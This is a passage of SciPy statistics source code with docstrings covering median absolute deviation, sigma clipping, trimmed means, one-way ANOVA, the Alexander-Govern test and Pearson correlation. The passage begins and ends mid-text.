Scale normal example:
>>> x = stats.norm.rvs(size=1000000, scale=2, random_state=123456)
>>> stats.median_abs_deviation(x)
1.3487398527041636
>>> stats.median_abs_deviation(x, scale='normal')
1.9996446978061115
"""
if not callable(center):
raise TypeError("The argument 'center' must be callable. The given "
f"value {repr(center)} is not callable.")
# An error may be raised here, so fail-fast, before doing lengthy
# computations, even though `scale` is not used until later
if isinstance(scale, str):
if scale.lower() == 'normal':
scale = 0.6744897501960817 # special.ndtri(0.75)
else:
raise ValueError(f"{scale} is not a valid scale value.")
x = asarray(x)
# Consistent with `np.var` and `np.std`.
if not x.size:
if axis is None:
return np.nan
nan_shape = tuple(item for i, item in enumerate(x.shape) if i != axis)
if nan_shape == ():
# Return nan, not array(nan)
return np.nan
return np.full(nan_shape, np.nan)
contains_nan, nan_policy = _contains_nan(x, nan_policy)
if contains_nan:
if axis is None:
mad = _mad_1d(x.ravel(), center, nan_policy)
else:
mad = np.apply_along_axis(_mad_1d, axis, x, center, nan_policy)
else:
if axis is None:
med = center(x, axis=None)
mad = np.median(np.abs(x - med))
else:
# Wrap the call to center() in expand_dims() so it acts like
# keepdims=True was used.
med = np.expand_dims(center(x, axis=axis), axis)
mad = np.median(np.abs(x - med), axis=axis)
return mad / scale
# Keep the top newline so that the message does not show up on the stats page
_median_absolute_deviation_deprec_msg = """
To preserve the existing default behavior, use
`scipy.stats.median_abs_deviation(..., scale=1/1.4826)`.
The value 1.4826 is not numerically precise for scaling
with a normal distribution. For a numerically precise value, use
`scipy.stats.median_abs_deviation(..., scale='normal')`.
"""
# Due to numpy/gh-16349 we need to unindent the entire docstring
@np.deprecate(old_name='median_absolute_deviation',
new_name='median_abs_deviation',
message=_median_absolute_deviation_deprec_msg)
def median_absolute_deviation(x, axis=0, center=np.median, scale=1.4826,
nan_policy='propagate'):
r"""
Compute the median absolute deviation of the data along the given axis.
The median absolute deviation (MAD, [1]_) computes the median over the
absolute deviations from the median. It is a measure of dispersion
similar to the standard deviation but more robust to outliers [2]_.
The MAD of an empty array is ``np.nan``.
.. versionadded:: 1.3.0
Parameters
----------
x : array_like
Input array or object that can be converted to an array.
axis : int or None, optional
Axis along which the range is computed. Default is 0. If None, compute
the MAD over the entire array.
center : callable, optional
A function that will return the central value. The default is to use
np.median. Any user defined function used will need to have the function
signature ``func(arr, axis)``.
scale : int, optional
The scaling factor applied to the MAD. The default scale (1.4826)
ensures consistency with the standard deviation for normally distributed
data.
nan_policy : {'propagate', 'raise', 'omit'}, optional
Defines how to handle when input contains nan.
The following options are available (default is 'propagate'):
* 'propagate': returns nan
* 'raise': throws an error
* 'omit': performs the calculations ignoring nan values
Returns
-------
mad : scalar or ndarray
If ``axis=None``, a scalar is returned. If the input contains
integers or floats of smaller precision than ``np.float64``, then the
output data-type is ``np.float64``. Otherwise, the output data-type is
the same as that of the input.
See Also
--------
numpy.std, numpy.var, numpy.median, scipy.stats.iqr, scipy.stats.tmean,
scipy.stats.tstd, scipy.stats.tvar
Notes
-----
The `center` argument only affects the calculation of the central value
around which the MAD is calculated. That is, passing in ``center=np.mean``
will calculate the MAD around the mean - it will not calculate the *mean*
absolute deviation.
References
----------
.. [1] "Median absolute deviation",
https://en.wikipedia.org/wiki/Median_absolute_deviation
.. [2] "Robust measures of scale",
https://en.wikipedia.org/wiki/Robust_measures_of_scale
Examples
--------
When comparing the behavior of `median_absolute_deviation` with ``np.std``,
the latter is affected when we change a single value of an array to have an
outlier value while the MAD hardly changes:
>>> from scipy import stats
>>> x = stats.norm.rvs(size=100, scale=1, random_state=123456)
>>> x.std()
0.9973906394005013
>>> stats.median_absolute_deviation(x)
1.2280762773108278
>>> x[0] = 345.6
>>> x.std()
34.42304872314415
>>> stats.median_absolute_deviation(x)
1.2340335571164334
Axis handling example:
>>> x = np.array([[10, 7, 4], [3, 2, 1]])
>>> x
array([[10, 7, 4],
[ 3, 2, 1]])
>>> stats.median_absolute_deviation(x)
array([5.1891, 3.7065, 2.2239])
>>> stats.median_absolute_deviation(x, axis=None)
2.9652
"""
if isinstance(scale, str):
if scale.lower() == 'raw':
warnings.warn(
"use of scale='raw' is deprecated, use scale=1.0 instead",
np.VisibleDeprecationWarning
)
scale = 1.0
if not isinstance(scale, str):
scale = 1 / scale
return median_abs_deviation(x, axis=axis, center=center, scale=scale,
nan_policy=nan_policy)
#####################################
# TRIMMING FUNCTIONS #
#####################################
SigmaclipResult = namedtuple('SigmaclipResult', ('clipped', 'lower', 'upper'))
def sigmaclip(a, low=4., high=4.):
"""Perform iterative sigma-clipping of array elements.
Starting from the full sample, all elements outside the critical range are
removed, i.e. all elements of the input array `c` that satisfy either of
the following conditions::
c < mean(c) - std(c)*low
c > mean(c) + std(c)*high
The iteration continues with the updated sample until no
elements are outside the (updated) range.
Parameters
----------
a : array_like
Data array, will be raveled if not 1-D.
low : float, optional
Lower bound factor of sigma clipping. Default is 4.
high : float, optional
Upper bound factor of sigma clipping. Default is 4.
Returns
-------
clipped : ndarray
Input array with clipped elements removed.
lower : float
Lower threshold value use for clipping.
upper : float
Upper threshold value use for clipping.
Examples
--------
>>> from scipy.stats import sigmaclip
>>> a = np.concatenate((np.linspace(9.5, 10.5, 31),
... np.linspace(0, 20, 5)))
>>> fact = 1.5
>>> c, low, upp = sigmaclip(a, fact, fact)
>>> c
array([ 9.96666667, 10. , 10.03333333, 10. ])
>>> c.var(), c.std()
(0.00055555555555555165, 0.023570226039551501)
>>> low, c.mean() - fact*c.std(), c.min()
(9.9646446609406727, 9.9646446609406727, 9.9666666666666668)
>>> upp, c.mean() + fact*c.std(), c.max()
(10.035355339059327, 10.035355339059327, 10.033333333333333)
>>> a = np.concatenate((np.linspace(9.5, 10.5, 11),
... np.linspace(-100, -50, 3)))
>>> c, low, upp = sigmaclip(a, 1.8, 1.8)
>>> (c == np.linspace(9.5, 10.5, 11)).all()
True
"""
c = np.asarray(a).ravel()
delta = 1
while delta:
c_std = c.std()
c_mean = c.mean()
size = c.size
critlower = c_mean - c_std * low
critupper = c_mean + c_std * high
c = c[(c >= critlower) & (c <= critupper)]
delta = size - c.size
return SigmaclipResult(c, critlower, critupper)
def trimboth(a, proportiontocut, axis=0):
"""Slice off a proportion of items from both ends of an array.
Slice off the passed proportion of items from both ends of the passed
array (i.e., with `proportiontocut` = 0.1, slices leftmost 10% **and**
rightmost 10% of scores). The trimmed values are the lowest and
highest ones.
Slice off less if proportion results in a non-integer slice index (i.e.
conservatively slices off `proportiontocut`).
Parameters
----------
a : array_like
Data to trim.
proportiontocut : float
Proportion (in range 0-1) of total data set to trim of each end.
axis : int or None, optional
Axis along which to trim data. Default is 0. If None, compute over
the whole array `a`.
Returns
-------
out : ndarray
Trimmed version of array `a`. The order of the trimmed content
is undefined.
See Also
--------
trim_mean
Examples
--------
>>> from scipy import stats
>>> a = np.arange(20)
>>> b = stats.trimboth(a, 0.1)
>>> b.shape
(16,)
"""
a = np.asarray(a)
if a.size == 0:
return a
if axis is None:
a = a.ravel()
axis = 0
nobs = a.shape[axis]
lowercut = int(proportiontocut * nobs)
uppercut = nobs - lowercut
if (lowercut >= uppercut):
raise ValueError("Proportion too big.")
atmp = np.partition(a, (lowercut, uppercut - 1), axis)
sl = [slice(None)] * atmp.ndim
sl[axis] = slice(lowercut, uppercut)
return atmp[tuple(sl)]
def trim1(a, proportiontocut, tail='right', axis=0):
"""Slice off a proportion from ONE end of the passed array distribution.
If `proportiontocut` = 0.1, slices off 'leftmost' or 'rightmost'
10% of scores. The lowest or highest values are trimmed (depending on
the tail).
Slice off less if proportion results in a non-integer slice index
(i.e. conservatively slices off `proportiontocut` ).
Parameters
----------
a : array_like
Input array.
proportiontocut : float
Fraction to cut off of 'left' or 'right' of distribution.
tail : {'left', 'right'}, optional
Defaults to 'right'.
axis : int or None, optional
Axis along which to trim data. Default is 0. If None, compute over
the whole array `a`.
Returns
-------
trim1 : ndarray
Trimmed version of array `a`. The order of the trimmed content is
undefined.
Examples
--------
>>> from scipy import stats
>>> a = np.arange(20)
>>> b = stats.trim1(a, 0.5, 'left')
>>> b
array([10, 11, 12, 13, 14, 16, 15, 17, 18, 19])
"""
a = np.asarray(a)
if axis is None:
a = a.ravel()
axis = 0
nobs = a.shape[axis]
# avoid possible corner case
if proportiontocut >= 1:
return []
if tail.lower() == 'right':
lowercut = 0
uppercut = nobs - int(proportiontocut * nobs)
elif tail.lower() == 'left':
lowercut = int(proportiontocut * nobs)
uppercut = nobs
atmp = np.partition(a, (lowercut, uppercut - 1), axis)
return atmp[lowercut:uppercut]
def trim_mean(a, proportiontocut, axis=0):
"""Return mean of array after trimming distribution from both tails.
If `proportiontocut` = 0.1, slices off 'leftmost' and 'rightmost' 10% of
scores. The input is sorted before slicing. Slices off less if proportion
results in a non-integer slice index (i.e., conservatively slices off
`proportiontocut` ).
Parameters
----------
a : array_like
Input array.
proportiontocut : float
Fraction to cut off of both tails of the distribution.
axis : int or None, optional
Axis along which the trimmed means are computed. Default is 0.
If None, compute over the whole array `a`.
Returns
-------
trim_mean : ndarray
Mean of trimmed array.
See Also
--------
trimboth
tmean : Compute the trimmed mean ignoring values outside given `limits`.
Examples
--------
>>> from scipy import stats
>>> x = np.arange(20)
>>> stats.trim_mean(x, 0.1)
9.5
>>> x2 = x.reshape(5, 4)
>>> x2
array([[ 0, 1, 2, 3],
[ 4, 5, 6, 7],
[ 8, 9, 10, 11],
[12, 13, 14, 15],
[16, 17, 18, 19]])
>>> stats.trim_mean(x2, 0.25)
array([ 8., 9., 10., 11.])
>>> stats.trim_mean(x2, 0.25, axis=1)
array([ 1.5, 5.5, 9.5, 13.5, 17.5])
"""
a = np.asarray(a)
if a.size == 0:
return np.nan
if axis is None:
a = a.ravel()
axis = 0
nobs = a.shape[axis]
lowercut = int(proportiontocut * nobs)
uppercut = nobs - lowercut
if (lowercut > uppercut):
raise ValueError("Proportion too big.")
atmp = np.partition(a, (lowercut, uppercut - 1), axis)
sl = [slice(None)] * atmp.ndim
sl[axis] = slice(lowercut, uppercut)
return np.mean(atmp[tuple(sl)], axis=axis)
F_onewayResult = namedtuple('F_onewayResult', ('statistic', 'pvalue'))
class F_onewayConstantInputWarning(RuntimeWarning):
"""
Warning generated by `f_oneway` when an input is constant, e.g.
each of the samples provided is a constant array.
"""
def __init__(self, msg=None):
if msg is None:
msg = ("Each of the input arrays is constant;"
"the F statistic is not defined or infinite")
self.args = (msg,)
class F_onewayBadInputSizesWarning(RuntimeWarning):
"""
Warning generated by `f_oneway` when an input has length 0,
or if all the inputs have length 1.
"""
pass
def _create_f_oneway_nan_result(shape, axis):
"""
This is a helper function for f_oneway for creating the return values
in certain degenerate conditions. It creates return values that are
all nan with the appropriate shape for the given `shape` and `axis`.
"""
axis = np.core.multiarray.normalize_axis_index(axis, len(shape))
shp = shape[:axis] + shape[axis+1:]
if shp == ():
f = np.nan
prob = np.nan
else:
f = np.full(shp, fill_value=np.nan)
prob = f.copy()
return F_onewayResult(f, prob)
def _first(arr, axis):
"""Return arr[..., 0:1, ...] where 0:1 is in the `axis` position."""
return np.take_along_axis(arr, np.array(0, ndmin=arr.ndim), axis)
def f_oneway(*args, axis=0):
"""Perform one-way ANOVA.
The one-way ANOVA tests the null hypothesis that two or more groups have
the same population mean. The test is applied to samples from two or
more groups, possibly with differing sizes.
Parameters
----------
sample1, sample2, ... : array_like
The sample measurements for each group. There must be at least
two arguments. If the arrays are multidimensional, then all the
dimensions of the array must be the same except for `axis`.
axis : int, optional
Axis of the input arrays along which the test is applied.
Default is 0.
Returns
-------
statistic : float
The computed F statistic of the test.
pvalue : float
The associated p-value from the F distribution.
Warns
-----
F_onewayConstantInputWarning
Raised if each of the input arrays is constant array.
In this case the F statistic is either infinite or isn't defined,
so ``np.inf`` or ``np.nan`` is returned.
F_onewayBadInputSizesWarning
Raised if the length of any input array is 0, or if all the input
arrays have length 1. ``np.nan`` is returned for the F statistic
and the p-value in these cases.
Notes
-----
The ANOVA test has important assumptions that must be satisfied in order
for the associated p-value to be valid.
1. The samples are independent.
2. Each sample is from a normally distributed population.
3. The population standard deviations of the groups are all equal. This
property is known as homoscedasticity.
If these assumptions are not true for a given set of data, it may still
be possible to use the Kruskal-Wallis H-test (`scipy.stats.kruskal`) or
the Alexander-Govern test (`scipy.stats.alexandergovern`) although with
some loss of power.
The length of each group must be at least one, and there must be at
least one group with length greater than one. If these conditions
are not satisfied, a warning is generated and (``np.nan``, ``np.nan``)
is returned.
If each group contains constant values, and there exist at least two
groups with different values, the function generates a warning and
returns (``np.inf``, 0).
If all values in all groups are the same, function generates a warning
and returns (``np.nan``, ``np.nan``).
The algorithm is from Heiman [2]_, pp.394-7.
References
----------
.. [1] R. Lowry, "Concepts and Applications of Inferential Statistics",
Chapter 14, 2014, http://vassarstats.net/textbook/
.. [2] G.W. Heiman, "Understanding research methods and statistics: An
integrated introduction for psychology", Houghton, Mifflin and
Company, 2001.
.. [3] G.H. McDonald, "Handbook of Biological Statistics", One-way ANOVA.
http://www.biostathandbook.com/onewayanova.html
Examples
--------
>>> from scipy.stats import f_oneway
Here are some data [3]_ on a shell measurement (the length of the anterior
adductor muscle scar, standardized by dividing by length) in the mussel
Mytilus trossulus from five locations: Tillamook, Oregon; Newport, Oregon;
Petersburg, Alaska; Magadan, Russia; and Tvarminne, Finland, taken from a
much larger data set used in McDonald et al. (1991).
>>> tillamook = [0.0571, 0.0813, 0.0831, 0.0976, 0.0817, 0.0859, 0.0735,
... 0.0659, 0.0923, 0.0836]
>>> newport = [0.0873, 0.0662, 0.0672, 0.0819, 0.0749, 0.0649, 0.0835,
... 0.0725]
>>> petersburg = [0.0974, 0.1352, 0.0817, 0.1016, 0.0968, 0.1064, 0.105]
>>> magadan = [0.1033, 0.0915, 0.0781, 0.0685, 0.0677, 0.0697, 0.0764,
... 0.0689]
>>> tvarminne = [0.0703, 0.1026, 0.0956, 0.0973, 0.1039, 0.1045]
>>> f_oneway(tillamook, newport, petersburg, magadan, tvarminne)
F_onewayResult(statistic=7.121019471642447, pvalue=0.0002812242314534544)
`f_oneway` accepts multidimensional input arrays. When the inputs
are multidimensional and `axis` is not given, the test is performed
along the first axis of the input arrays. For the following data, the
test is performed three times, once for each column.
>>> a = np.array([[9.87, 9.03, 6.81],
... [7.18, 8.35, 7.00],
... [8.39, 7.58, 7.68],
... [7.45, 6.33, 9.35],
... [6.41, 7.10, 9.33],
... [8.00, 8.24, 8.44]])
>>> b = np.array([[6.35, 7.30, 7.16],
... [6.65, 6.68, 7.63],
... [5.72, 7.73, 6.72],
... [7.01, 9.19, 7.41],
... [7.75, 7.87, 8.30],
... [6.90, 7.97, 6.97]])
>>> c = np.array([[3.31, 8.77, 1.01],
... [8.25, 3.24, 3.62],
... [6.32, 8.81, 5.19],
... [7.48, 8.83, 8.91],
... [8.59, 6.01, 6.07],
... [3.07, 9.72, 7.48]])
>>> F, p = f_oneway(a, b, c)
>>> F
array([1.75676344, 0.03701228, 3.76439349])
>>> p
array([0.20630784, 0.96375203, 0.04733157])
"""
if len(args) < 2:
raise TypeError(f'at least two inputs are required; got {len(args)}.')
args = [np.asarray(arg, dtype=float) for arg in args]
# ANOVA on N groups, each in its own array
num_groups = len(args)
# We haven't explicitly validated axis, but if it is bad, this call of
# np.concatenate will raise np.AxisError. The call will raise ValueError
# if the dimensions of all the arrays, except the axis dimension, are not
# the same.
alldata = np.concatenate(args, axis=axis)
bign = alldata.shape[axis]
# Check this after forming alldata, so shape errors are detected
# and reported before checking for 0 length inputs.
if any(arg.shape[axis] == 0 for arg in args):
warnings.warn(F_onewayBadInputSizesWarning('at least one input '
'has length 0'))
return _create_f_oneway_nan_result(alldata.shape, axis)
# Must have at least one group with length greater than 1.
if all(arg.shape[axis] == 1 for arg in args):
msg = ('all input arrays have length 1. f_oneway requires that at '
'least one input has length greater than 1.')
warnings.warn(F_onewayBadInputSizesWarning(msg))
return _create_f_oneway_nan_result(alldata.shape, axis)
# Check if the values within each group are constant, and if the common
# value in at least one group is different from that in another group.
# Based on https://github.com/scipy/scipy/issues/11669
# If axis=0, say, and the groups have shape (n0, ...), (n1, ...), ...,
# then is_const is a boolean array with shape (num_groups, ...).
# It is True if the groups along the axis slice are each consant.
# In the typical case where each input array is 1-d, is_const is a
# 1-d array with length num_groups.
is_const = np.concatenate([(_first(a, axis) == a).all(axis=axis,
keepdims=True)
for a in args], axis=axis)
# all_const is a boolean array with shape (...) (see previous comment).
# It is True if the values within each group along the axis slice are
# the same (e.g. [[3, 3, 3], [5, 5, 5, 5], [4, 4, 4]]).
all_const = is_const.all(axis=axis)
if all_const.any():
warnings.warn(F_onewayConstantInputWarning())
# all_same_const is True if all the values in the groups along the axis=0
# slice are the same (e.g. [[3, 3, 3], [3, 3, 3, 3], [3, 3, 3]]).
all_same_const = (_first(alldata, axis) == alldata).all(axis=axis)
# Determine the mean of the data, and subtract that from all inputs to a
# variance (via sum_of_sq / sq_of_sum) calculation. Variance is invariant
# to a shift in location, and centering all data around zero vastly
# improves numerical stability.
offset = alldata.mean(axis=axis, keepdims=True)
alldata -= offset
normalized_ss = _square_of_sums(alldata, axis=axis) / bign
sstot = _sum_of_squares(alldata, axis=axis) - normalized_ss
ssbn = 0
for a in args:
ssbn += _square_of_sums(a - offset, axis=axis) / a.shape[axis]
# Naming: variables ending in bn/b are for "between treatments", wn/w are
# for "within treatments"
ssbn -= normalized_ss
sswn = sstot - ssbn
dfbn = num_groups - 1
dfwn = bign - num_groups
msb = ssbn / dfbn
msw = sswn / dfwn
with np.errstate(divide='ignore', invalid='ignore'):
f = msb / msw
prob = special.fdtrc(dfbn, dfwn, f) # equivalent to stats.f.sf
# Fix any f values that should be inf or nan because the corresponding
# inputs were constant.
if np.isscalar(f):
if all_same_const:
f = np.nan
prob = np.nan
elif all_const:
f = np.inf
prob = 0.0
else:
f[all_const] = np.inf
prob[all_const] = 0.0
f[all_same_const] = np.nan
prob[all_same_const] = np.nan
return F_onewayResult(f, prob)
def alexandergovern(*args, nan_policy='propagate'):
"""Performs the Alexander Govern test.
The Alexander-Govern approximation tests the equality of k independent
means in the face of heterogeneity of variance. The test is applied to
samples from two or more groups, possibly with differing sizes.
Parameters
----------
sample1, sample2, ... : array_like
The sample measurements for each group. There must be at least
two samples.
nan_policy : {'propagate', 'raise', 'omit'}, optional
Defines how to handle when input contains nan.
The following options are available (default is 'propagate'):
* 'propagate': returns nan
* 'raise': throws an error
* 'omit': performs the calculations ignoring nan values
Returns
-------
statistic : float
The computed A statistic of the test.
pvalue : float
The associated p-value from the chi-squared distribution.
Warns
-----
AlexanderGovernConstantInputWarning
Raised if an input is a constant array. The statistic is not defined
in this case, so ``np.nan`` is returned.
See Also
--------
f_oneway : one-way ANOVA
Notes
-----
The use of this test relies on several assumptions.
1. The samples are independent.
2. Each sample is from a normally distributed population.
3. Unlike `f_oneway`, this test does not assume on homoscedasticity,
instead relaxing the assumption of equal variances.
Input samples must be finite, one dimensional, and with size greater than
one.
References
----------
.. [1] Alexander, Ralph A., and Diane M. Govern. "A New and Simpler
Approximation for ANOVA under Variance Heterogeneity." Journal
of Educational Statistics, vol. 19, no. 2, 1994, pp. 91-101.
JSTOR, www.jstor.org/stable/1165140. Accessed 12 Sept. 2020.
Examples
--------
>>> from scipy.stats import alexandergovern
Here are some data on annual percentage rate of interest charged on
new car loans at nine of the largest banks in four American cities
taken from the National Institute of Standards and Technology's
ANOVA dataset.
We use `alexandergovern` to test the null hypothesis that all cities
have the same mean APR against the alternative that the cities do not
all have the same mean APR. We decide that a significance level of 5%
is required to reject the null hypothesis in favor of the alternative.
>>> atlanta = [13.75, 13.75, 13.5, 13.5, 13.0, 13.0, 13.0, 12.75, 12.5]
>>> chicago = [14.25, 13.0, 12.75, 12.5, 12.5, 12.4, 12.3, 11.9, 11.9]
>>> houston = [14.0, 14.0, 13.51, 13.5, 13.5, 13.25, 13.0, 12.5, 12.5]
>>> memphis = [15.0, 14.0, 13.75, 13.59, 13.25, 12.97, 12.5, 12.25,
... 11.89]
>>> alexandergovern(atlanta, chicago, houston, memphis)
AlexanderGovernResult(statistic=4.65087071883494,
pvalue=0.19922132490385214)
The p-value is 0.1992, indicating a nearly 20% chance of observing
such an extreme value of the test statistic under the null hypothesis.
This exceeds 5%, so we do not reject the null hypothesis in favor of
the alternative.
"""
args = _alexandergovern_input_validation(args, nan_policy)
if np.any([(arg == arg[0]).all() for arg in args]):
warnings.warn(AlexanderGovernConstantInputWarning())
return AlexanderGovernResult(np.nan, np.nan)
# The following formula numbers reference the equation described on
# page 92 by Alexander, Govern. Formulas 5, 6, and 7 describe other
# tests that serve as the basis for equation (8) but are not needed
# to perform the test.
# precalculate mean and length of each sample
lengths = np.array([ma.count(arg) if nan_policy == 'omit' else len(arg)
for arg in args])
means = np.array([np.mean(arg) for arg in args])
# (1) determine standard error of the mean for each sample
standard_errors = [np.std(arg, ddof=1) / np.sqrt(length)
for arg, length in zip(args, lengths)]
# (2) define a weight for each sample
inv_sq_se = 1 / np.square(standard_errors)
weights = inv_sq_se / np.sum(inv_sq_se)
# (3) determine variance-weighted estimate of the common mean
var_w = np.sum(weights * means)
# (4) determine one-sample t statistic for each group
t_stats = (means - var_w)/standard_errors
# calculate parameters to be used in transformation
v = lengths - 1
a = v - .5
b = 48 * a**2
c = (a * np.log(1 + (t_stats ** 2)/v))**.5
# (8) perform a normalizing transformation on t statistic
z = (c + ((c**3 + 3*c)/b) -
((4*c**7 + 33*c**5 + 240*c**3 + 855*c) /
(b**2*10 + 8*b*c**4 + 1000*b)))
# (9) calculate statistic
A = np.sum(np.square(z))
# "[the p value is determined from] central chi-square random deviates
# with k - 1 degrees of freedom". Alexander, Govern (94)
p = distributions.chi2.sf(A, len(args) - 1)
return AlexanderGovernResult(A, p)
def _alexandergovern_input_validation(args, nan_policy):
if len(args) < 2:
raise TypeError(f"2 or more inputs required, got {len(args)}")
# input arrays are flattened
args = [np.asarray(arg, dtype=float) for arg in args]
for i, arg in enumerate(args):
if np.size(arg) <= 1:
raise ValueError("Input sample size must be greater than one.")
if arg.ndim != 1:
raise ValueError("Input samples must be one-dimensional")
if np.isinf(arg).any():
raise ValueError("Input samples must be finite.")
contains_nan, nan_policy = _contains_nan(arg, nan_policy=nan_policy)
if contains_nan and nan_policy == 'omit':
args[i] = ma.masked_invalid(arg)
return args
AlexanderGovernResult = make_dataclass("AlexanderGovernResult", ("statistic",
"pvalue"))
class AlexanderGovernConstantInputWarning(RuntimeWarning):
"""Warning generated by `alexandergovern` when an input is constant."""
def __init__(self, msg=None):
if msg is None:
msg = ("An input array is constant; the statistic is not defined.")
self.args = (msg,)
class PearsonRConstantInputWarning(RuntimeWarning):
"""Warning generated by `pearsonr` when an input is constant."""
def __init__(self, msg=None):
if msg is None:
msg = ("An input array is constant; the correlation coefficient "
"is not defined.")
self.args = (msg,)
class PearsonRNearConstantInputWarning(RuntimeWarning):
"""Warning generated by `pearsonr` when an input is nearly constant."""
def __init__(self, msg=None):
if msg is None:
msg = ("An input array is nearly constant; the computed "
"correlation coefficient may be inaccurate.")
self.args = (msg,)
def pearsonr(x, y):
r"""
Pearson correlation coefficient and p-value for testing non-correlation.
The Pearson correlation coefficient [1]_ measures the linear relationship
between two datasets. The calculation of the p-value relies on the
assumption that each dataset is normally distributed. (See Kowalski [3]_
for a discussion of the effects of non-normality of the input on the
distribution of the correlation coefficient.) Like other correlation
coefficients, this one varies between -1 and +1 with 0 implying no
correlation. Correlations of -1 or +1 imply an exact linear relationship.
Parameters
----------
x : (N,) array_like
Input array.
y : (N,) array_like
Input array.
Returns
-------
r : float
Pearson's correlation coefficient.
p-value : float
Two-tailed p-value.
Warns
-----
PearsonRConstantInputWarning
Raised if an input is a constant array. The correlation coefficient
is not defined in this case, so ``np.nan`` is returned.
PearsonRNearConstantInputWarning
Raised if an input is "nearly" constant. The array ``x`` is considered
nearly constant if ``norm(x - mean(x)) < 1e-13 * abs(mean(x))``.
Numerical errors in the calculation ``x - mean(x)`` in this case might
result in an inaccurate calculation of r.
See Also
--------
spearmanr : Spearman rank-order correlation coefficient.
kendalltau : Kendall's tau, a correlation measure for ordinal data.
Notes
-----
The correlation coefficient is calculated as follows:
.. math::
r = \frac{\sum (x - m_x) (y - m_y)}
{\sqrt{\sum (x - m_x)^2 \sum (y - m_y)^2}}
where :math:`m_x` is the mean of the vector x and :math:`m_y` is
the mean of the vector y.
Under the assumption that x and y are drawn from
independent normal distributions (so the population correlation coefficient
is 0), the probability density function of the sample correlation
coefficient r is ([1]_, [2]_):
.. math::
f(r) = \frac{{(1-r^2)}^{n/2-2}}{\mathrm{B}(\frac{1}{2},\frac{n}{2}-1)}
where n is the number of samples, and B is the beta function. This
is sometimes referred to as the exact distribution of r. This is
the distribution that is used in `pearsonr` to compute the p-value.
The distribution is a beta distribution on the interval [-1, 1],
with equal shape parameters a = b = n/2 - 1. In terms of SciPy's
implementation of the beta distribution, the distribution of r is::
dist = scipy.stats.beta(n/2 - 1, n/2 - 1, loc=-1, scale=2)
The p-value returned by `pearsonr` is a two-sided p-value. The p-value
roughly indicates the probability of an uncorrelated system
producing datasets that have a Pearson correlation at least as extreme
as the one computed from these datasets. More precisely, for a
given sample with correlation coefficient r, the p-value is
the probability that abs(r') of a random sample x' and y' drawn from
the population with zero correlation would be greater than or equal
to abs(r). In terms of the object ``dist`` shown above, the p-value
for a given r and length n can be computed as::
p = 2*dist.cdf(-abs(r))
When n is 2, the above continuous distribution is not well-defined.
One can interpret the limit of the beta distribution as the shape
parameters a and b approach a = b = 0 as a discrete distribution with
equal probability masses at r = 1 and r = -1. More directly, one
can observe that, given the data x = [x1, x2] and y = [y1, y2], and
assuming x1 != x2 and y1 != y2, the only possible values for r are 1
and -1. Because abs(r') for any sample x' and y' with length 2 will
be 1, the two-sided p-value for a sample of length 2 is always 1.
References
----------
.. [1] "Pearson correlation coefficient", Wikipedia,
https://en.wikipedia.org/wiki/Pearson_correlation_coefficient
.. [2] Student, "Probable error of a correlation coefficient",
Biometrika, Volume 6, Issue 2-3, 1 September 1908, pp. 302-310.
.. [3] C. J. Kowalski, "On the Effects of Non-Normality on the Distribution
of the Sample Product-Moment Correlation Coefficient"
Journal of the Royal Statistical Society. Series C (Applied
Statistics), Vol. 21, No. 1 (1972), pp. 1-12.
Examples
--------
>>> from scipy import stats
>>> stats.pearsonr([1, 2, 3, 4, 5], [10, 9, 2.5, 6, 4])
(-0.7426106572325057, 0.1505558088534455)
There is a linear dependence between x and y if y = a + b*x + e, where
a,b are constants and e is a random error term, assumed to be independent
of x. For simplicity, assume that x is standard normal, a=0, b=1 and let
e follow a normal distribution with mean zero and standard deviation s>0.
>>> s = 0.5
>>> x = stats.norm.rvs(size=500)
>>> e = stats.norm.rvs(scale=s, size=500)
>>> y = x + e
>>> stats.pearsonr(x, y)
(0.9029601878969703, 8.428978827629898e-185) # may vary
This should be close to the exact value given by
>>> 1/np.sqrt(1 + s**2)
0.8944271909999159
For s=0.5, we observe a high level of correlation. In general, a large
variance of the noise reduces the correlation, while the correlation
approaches one as the variance of the error goes to zero.
It is important to keep in mind that no correlation does not imply
independence unless (x, y) is jointly normal. Correlation can even be zero
when there is a very simple dependence structure: if X follows a
standard normal distribution, let y = abs(x). Note that the correlation
between x and y is zero. Indeed, since the expectation of x is zero,
cov(x, y) = E[x*y]. By definition, this equals E[x*abs(x)] which is zero
by symmetry. The following lines of code illustrate this observation:
>>> y = np.abs(x)
>>> stats.pearsonr(x, y)
(-0.016172891856853524, 0.7182823678751942) # may vary
A non-zero correlation coefficient can be misleading. For example, if X has
a standard normal distribution, define y = x if x < 0 and y = 0 otherwise.
A simple calculation shows that corr(x, y) = sqrt(2/Pi) = 0.797...,
implying a high level of correlation:
>>> y = np.where(x < 0, x, 0)
>>> stats.pearsonr(x, y)
(0.8537091583771509, 3.183461621422181e-143) # may vary
This is unintuitive since there is no dependence of x and y if x is larger
than zero which happens in about half of the cases if we sample x and y.
"""
n = len(x)
if n != len(y):
raise ValueError('x and y must have the same length.')
if n < 2:
raise ValueError('x and y must have length at least 2.')
x = np.asarray(x)
y = np.asarray(y)
# If an input is constant, the correlation coefficient is not defined.
if (x == x[0]).all() or (y == y[0]).all():
warnings.warn(PearsonRConstantInputWarning())
return np.nan, np.nan
# dtype is the data type for the calculations. This expression ensures
# that the data type is at least 64 bit floating point. It might have
# more precision if the input is, for example, np.longdouble.
dtype = type(1.0 + x[0] + y[0])
if n == 2:
return dtype(np.sign(x[1] - x[0])*np.sign(y[1] - y[0])), 1.0
xmean = x.mean(dtype=dtype)
ymean = y.mean(dtype=dtype)
# By using `astype(dtype)`, we ensure that the intermediate calculations
# use at least 64 bit floating point.
xm = x.astype(dtype) - xmean
ym = y.astype(dtype) - ymean
# Unlike np.linalg.norm or the expression sqrt((xm*xm).sum()),
# scipy.linalg.norm(xm) does not overflow if xm is, for example,
# [-5e210, 5e210, 3e200, -3e200]
normxm = linalg.norm(xm)
normym = linalg.norm(ym)
threshold = 1e-13
if normxm < threshold*abs(xmean) or normym < threshold*abs(ymean):
# If all the values in x (likewise y) are very close to the mean,
# the loss of precision that occurs in the subtraction xm = x - xmean
# might result in large errors in r.
warnings.warn(PearsonRNearConstantInputWarning())
r = np.dot(xm/normxm, ym/normym)
# Presumably, if abs(r) > 1, then it is only some small artifact of
# floating point arithmetic.
r = max(min(r, 1.0), -1.0)
# As explained in the docstring, the p-value can be computed as
# p = 2*dist.cdf(-abs(r))
# where dist is the beta distribution on [-1, 1] with shape parameters
# a = b = n/2 - 1. `special.btdtr` is the CDF for the beta distribution
# on [0, 1]. To use it, we make the transformation x = (r + 1)/2; the
# shape parameters do not change. Then -abs(r) used in `cdf(-abs(r))`
